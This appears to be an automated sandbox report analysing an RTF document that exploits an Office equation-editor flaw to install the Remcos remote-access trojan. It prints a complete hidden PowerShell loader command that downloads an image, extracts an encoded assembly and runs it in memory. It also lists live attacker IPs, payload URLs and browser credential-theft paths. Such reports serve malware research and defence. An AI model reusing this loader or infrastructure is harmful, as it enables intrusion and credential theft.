? ? ? ?mg? ? ? ? ?v? ? ? ? ?gk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?g4? ? ? ? ?zqb3? ? ? ? ?f8? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?f8? ? ? ? ?mg? ? ? ? ?w? ? ? ? ?di? ? ? ? ?n? ? ? ? ?? ? ? ? ?w? ? ? ? ?dk? ? ? ? ?m? ? ? ? ?? ? ? ? ?1? ? ? ? ?c8? ? ? ? ?bgbl? ? ? ? ?hc? ? ? ? ?xwbp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?lgbq? ? ? ? ?h? ? ? ? ?? ? ? ? ?zw? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?b3? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?bo? ? ? ? ?gu? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?e8? ? ? ? ?ygbq? ? ? ? ?gu? ? ? ? ?ywb0? ? ? ? ?c? ? ? ? ?? ? ? ? ?uwb5? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?lgbo? ? ? ? ?gu? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?fc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?qgb5? ? ? ? ?hq? ? ? ? ?zqbz? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cq? ? ? ? ?dwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?lgbe? ? ? ? ?g8? ? ? ? ?dwbu? ? ? ? ?gw? ? ? ? ?bwbh? ? ? ? ?gq? ? ? ? ?r? ? ? ? ?bh? ? ? ? ?hq? ? ? ? ?yq? ? ? ? ?o? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?fu? ? ? ? ?cgbs? ? ? ? ?ck? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbu? ? ? ? ?gu? ? ? ? ?e? ? ? ? ?b0? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?fs? ? ? ? ?uwb5? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?lgbu? ? ? ? ?gu? ? ? ? ?e? ? ? ? ?b0? ? ? ? ?c4? ? ? ? ?rqbu? ? ? ? ?gm? ? ? ? ?bwbk? ? ? ? ?gk? ? ? ? ?bgbn? ? ? ? ?f0? ? ? ? ?og? ? ? ? ?6? ? ? ? ?fu? ? ? ? ?v? ? ? ? ?bg? ? ? ? ?dg? ? ? ? ?lgbh? ? ? ? ?gu? ? ? ? ?d? ? ? ? ?bt? ? ? ? ?hq? ? ? ? ?cgbp? ? ? ? ?g4? ? ? ? ?zw? ? ? ? ?o? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?ei? ? ? ? ?eqb0? ? ? ? ?gu? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bz? ? ? ? ?hq? ? ? ? ?yqby? ? ? ? ?hq? ? ? ? ?rgbs? ? ? ? ?ge? ? ? ? ?zw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?n? ? ? ? ?dw? ? ? ? ?p? ? ? ? ?bc? ? ? ? ?ee? ? ? ? ?uwbf? ? ? ? ?dy? ? ? ? ?n? ? ? ? ?bf? ? ? ? ?fm? ? ? ? ?v? ? ? ? ?bb? ? ? ? ?fi? ? ? ? ?v? ? ? ? ?? ? ? ? ?+? ? ? ? ?d4? ? ? ? ?jw? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?zqbu? ? ? ? ?gq? ? ? ? ?rgbs? ? ? ? ?ge? ? ? ? ?zw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?n? ? ? ? ?dw? ? ? ? ?p? ? ? ? ?bc? ? ? ? ?ee? ? ? ? ?uwbf? ? ? ? ?d
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.tsonu/124/321.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"
                Source: RegAsm.exe, 00000009.00000002.906391209.0000000000911000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerChrome] - Microsoft Word
                Source: RegAsm.exe, 00000009.00000002.906391209.0000000000911000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                Source: RegAsm.exe, 00000009.00000002.906391209.0000000000946000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.906391209.0000000000911000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.906391209.0000000000967000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00434CB6 cpuid 9_2_00434CB6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,9_2_0045201B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,9_2_004520B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,9_2_00452143
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,9_2_00452393
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,9_2_00448484
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,9_2_004524BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,9_2_004525C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,9_2_00452690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,9_2_0044896D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,9_2_0040F90C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,GetLocaleInfoW,9_2_00451D58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,9_2_00451FD0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004489D7 GetSystemTimeAsFileTime,9_2_004489D7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041B69E GetUserNameW,9_2_0041B69E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,9_2_00449210
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: Yara match | File source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.powershell.exe.46deb20.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.powershell.exe.46deb20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.906391209.0000000000911000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.398638126.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3644, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3752, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 9_2_0040BA4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 9_2_0040BB6B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: \key3.db 9_2_0040BB6B

Remote Access Functionality

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-O0U3JA
Source: Yara match | File source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.powershell.exe.46deb20.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.powershell.exe.46deb20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.906391209.0000000000911000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.398638126.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3644, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3752, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: cmd.exe 9_2_0040569A
MITRE ATT&CK Matrix (techniques listed per tactic column; the digits preceding a technique are the matrix cell's signature-count badges):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
Resource Development: 111 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
Execution: 1 Native API; 53 Exploitation for Client Execution; 121 Command and Scripting Interpreter; 2 Service Execution; 3 PowerShell; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
Persistence: 111 Scripting; 1 DLL Side-Loading; 1 Windows Service; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Privilege Escalation: 1 DLL Side-Loading; 1 Bypass User Account Control; 1 Access Token Manipulation; 1 Windows Service; 222 Process Injection; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Defense Evasion: 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Install Root Certificate; 1 DLL Side-Loading; 1 Bypass User Account Control; 1 Masquerading; 1 Modify Registry; 21 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 222 Process Injection; Stripped Payloads
Credential Access: 1 OS Credential Dumping; 211 Input Capture; 2 Credentials In Files; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
Discovery: 2 System Time Discovery; 1 Account Discovery; 1 System Service Discovery; 3 File and Directory Discovery; 34 System Information Discovery; 2 Security Software Discovery; 21 Virtualization/Sandbox Evasion; 3 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery; 1 Remote System Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
Collection: 11 Archive Collected Data; 211 Input Capture; 3 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
Command and Control: 13 Ingress Tool Transfer; 21 Encrypted Channel; 1 Non-Standard Port; 1 Remote Access Software; 2 Non-Application Layer Protocol; 113 Application Layer Protocol; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; 1 Defacement; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption
Behavior Graph (ID: 1509586, sample: xnHel.rtf, start date: 11/09/2024, architecture: WINDOWS, score: 100). Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 21 other signatures. Process chain as recorded in the graph:

• WINWORD.EXE: dropped C:\Users\...\~WRD0000.tmp:Zone.Identifier (ASCII), C:\Users\user\Desktop\~WRD0000.tmp (Rich), C:\Users\user\Desktop\~$xnHel.rtf (data) and 2 other malicious files; started EQNEDT32.EXE
• EQNEDT32.EXE: network: 45.90.89.123, 49161, 49163, 80 (CMCSUS, Bulgaria); dropped C:\...\seennewthingsentireworldseethethin.vbS (Unicode); signatures: Office equation editor establishes network connection; Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802); started wscript.exe
• wscript.exe: signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Very long command line found; 3 other signatures; started powershell.exe
• powershell.exe: signatures: Suspicious powershell command line found; Suspicious execution chain found; started powershell.exe
• powershell.exe: network: ia601706.us.archive.org 207.241.227.96, 443, 49162 (INTERNET-ARCHIVEUS, United States); signatures: Installs new ROOT certificates; Writes to foreign memory regions; Injects a PE file into a foreign processes; started RegAsm.exe
• RegAsm.exe: network: 45.90.89.98, 49164, 8243 (CMCSUS, Bulgaria); geoplugin.net 178.237.33.50, 49165, 80 (ATOM86-ASATOM86NL, Netherlands); signatures: Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Contains functionality to change the wallpaper; 5 other signatures

Source | Detection | Scanner | Label
xnHel.rtf | 47% | ReversingLabs | Document-RTF.Exploit.CVE-2017-11882
xnHel.rtf | 100% | Avira | HEUR/Rtf.Malformed

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{0230E32B-C301-4FA6-B113-F550CB612E0B}.tmp | 100% | Avira | EXP/CVE-2017-11882.Gen
C:\Users\user\Desktop\~WRD0000.tmp | 100% | Avira | EXP/CVE-2017-11882.Gen
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://45.90.89.123/421/UNOST.txt | 0% | Avira URL Cloud | safe
45.90.89.98 | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gp& | 0% | Avira URL Cloud | safe
http://ocsp.entrust.net03 | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gp= | 0% | Avira URL Cloud | safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | Avira URL Cloud | safe
http://crl.entrust.net/server1.crl0 | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gp | 0% | Avira URL Cloud | safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | Avira URL Cloud | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | Avira URL Cloud | safe
http://45.90.89.123/421/seennewthingsentireworldseethethings.tIFj | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gp/C | 0% | Avira URL Cloud | safe
https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg | 0% | Avira URL Cloud | safe
https://ia601706.us.archive.org | 0% | Avira URL Cloud | safe
http://45.90.89.123/421/seennewthingsentireworldseethethings.tIF | 0% | Avira URL Cloud | safe
http://45.90.89.123 | 0% | Avira URL Cloud | safe
http://45.90.89.123/421/seennewthingsentireworldseethethings.tIFr | 0% | Avira URL Cloud | safe
http://go.microsoft.c | 0% | Avira URL Cloud | safe
http://ocsp.entrust.net0D | 0% | Avira URL Cloud | safe
https://secure.comodo.com/CPS0 | 0% | Avira URL Cloud | safe
http://crl.entrust.net/2048ca.crl0 | 0% | Avira URL Cloud | safe
https://ia601706.us.archive.org/2/items/new_image_LR | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
geoplugin.net | 178.237.33.50 | true | false | (none) | unknown
ia601706.us.archive.org | 207.241.227.96 | true | true | (none) | unknown
Name | Malicious | Antivirus Detection | Reputation
45.90.89.98 | true | Avira URL Cloud: safe | unknown
http://45.90.89.123/421/UNOST.txt | true | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp | false | Avira URL Cloud: safe | unknown
https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg | true | Avira URL Cloud: safe | unknown
http://45.90.89.123/421/seennewthingsentireworldseethethings.tIF | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000008.00000002.398638126.00000000037A9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://geoplugin.net/json.gp& | RegAsm.exe, 00000009.00000002.906391209.00000000008F5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.entrust.net/server1.crl0 | powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.entrust.net03 | powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000008.00000002.398638126.00000000037A9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000008.00000002.398638126.00000000037A9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.diginotar.nl/cps/pkioverheid0 | powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp= | RegAsm.exe, 00000009.00000002.906391209.00000000008F5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://45.90.89.123/421/seennewthingsentireworldseethethings.tIFj | EQNEDT32.EXE, 00000002.00000002.380189170.00000000005ED000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp/C | powershell.exe, 00000008.00000002.398638126.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://45.90.89.123/421/seennewthingsentireworldseethethings.tIFr | EQNEDT32.EXE, 00000002.00000002.380189170.00000000005ED000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000008.00000002.398638126.00000000037A9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000008.00000002.398638126.00000000037A9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ia601706.us.archive.org | powershell.exe, 00000008.00000002.398173022.00000000028B9000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://go.microsoft.c | powershell.exe, 00000008.00000002.398059563.000000000078A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://45.90.89.123 | powershell.exe, 00000008.00000002.398173022.00000000029D9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.entrust.net0D | powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000006.00000002.402026819.0000000002781000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.398173022.0000000002781000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://secure.comodo.com/CPS0 | powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ia601706.us.archive.org/2/items/new_image_LR | powershell.exe, 00000006.00000002.402026819.0000000002970000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.entrust.net/2048ca.crl0 | powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
207.241.227.96 | ia601706.us.archive.org | United States | 7941 | INTERNET-ARCHIVEUS | true
45.90.89.123 | unknown | Bulgaria | 33657 | CMCSUS | true
45.90.89.98 | unknown | Bulgaria | 33657 | CMCSUS | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1509586
Start date and time: 2024-09-11 20:21:11 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 29s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: xnHel.rtf
Detection: MAL
Classification: mal100.rans.troj.spyw.expl.evad.winRTF@10/21@2/4
                    EGA Information:
                    • Successful, ratio: 50%
                    HCA Information:
                    • Successful, ratio: 97%
                    • Number of executed functions: 69
                    • Number of non-executed functions: 183
                    Cookbook Comments:
                    • Found application associated with file extension: .rtf
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Scroll down
                    • Close Viewer
                    • Override analysis time to 79848.3484625322 for current running targets taking high CPU consumption
                    • Override analysis time to 159696.696925064 for current running targets taking high CPU consumption
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                    • Execution Graph export aborted for target EQNEDT32.EXE, PID 3340 because there are no executed function
                    • Execution Graph export aborted for target powershell.exe, PID 3536 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • VT rate limit hit for: xnHel.rtf
Time | Type | Description
14:22:13 | API Interceptor | 69x Sleep call for process: EQNEDT32.EXE modified
14:22:16 | API Interceptor | 10x Sleep call for process: wscript.exe modified
14:22:17 | API Interceptor | 102x Sleep call for process: powershell.exe modified
14:22:29 | API Interceptor | 9690448x Sleep call for process: RegAsm.exe modified
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    207.241.227.96INV_00983.xlsGet hashmaliciousRemcosBrowse
                      Enquiry.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                        RFQ_0230909024SEPT.xla.xlsxGet hashmaliciousRemcosBrowse
                          xrrwwstCMd.docxGet hashmaliciousRemcosBrowse
                            45.90.89.98PO FT-151-2024 PETROMAT.xlsGet hashmaliciousRemcosBrowse
                              August Shipment - Inv No. 041.xlsGet hashmaliciousRemcosBrowse
                                SecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtfGet hashmaliciousRemcosBrowse
                                  M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                    oothgirl.docGet hashmaliciousRemcosBrowse
                                      M12_20240821_0.xlsGet hashmaliciousRemcosBrowse
                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.8441.24466.rtfGet hashmaliciousRemcosBrowse
  M12_20240821_06212.xls | malicious | Remcos
  SecuriteInfo.com.Exploit.CVE-2017-11882.123.11787.15148.rtf | malicious | Remcos
  wire_receipt.xls | malicious | Remcos
Match: 178.237.33.50
  INV_00983.xls | malicious | Remcos | context: geoplugin.net/json.gp
  rfq_last_quater_product_purchase_order_import_list_11_06_2024_000000110924.cmd | malicious | GuLoader, Remcos | context: geoplugin.net/json.gp
  ORDER DATASHEET.bat | malicious | Remcos, GuLoader | context: geoplugin.net/json.gp
  rfq_final_product_purchase_order_import_list_10_09_2024_00000024.cmd | malicious | GuLoader, Remcos | context: geoplugin.net/json.gp
  HSBC E-Statement Doc_pdf.exe | malicious | Remcos | context: geoplugin.net/json.gp
  RFQ_0230909024SEPT.xla.xlsx | malicious | Remcos | context: geoplugin.net/json.gp
  xrrwwstCMd.docx | malicious | Remcos | context: geoplugin.net/json.gp
  fYHJsEQSv0.exe | malicious | Remcos | context: geoplugin.net/json.gp
  PxPsy1hml9.exe | malicious | Remcos, PureLog Stealer | context: geoplugin.net/json.gp
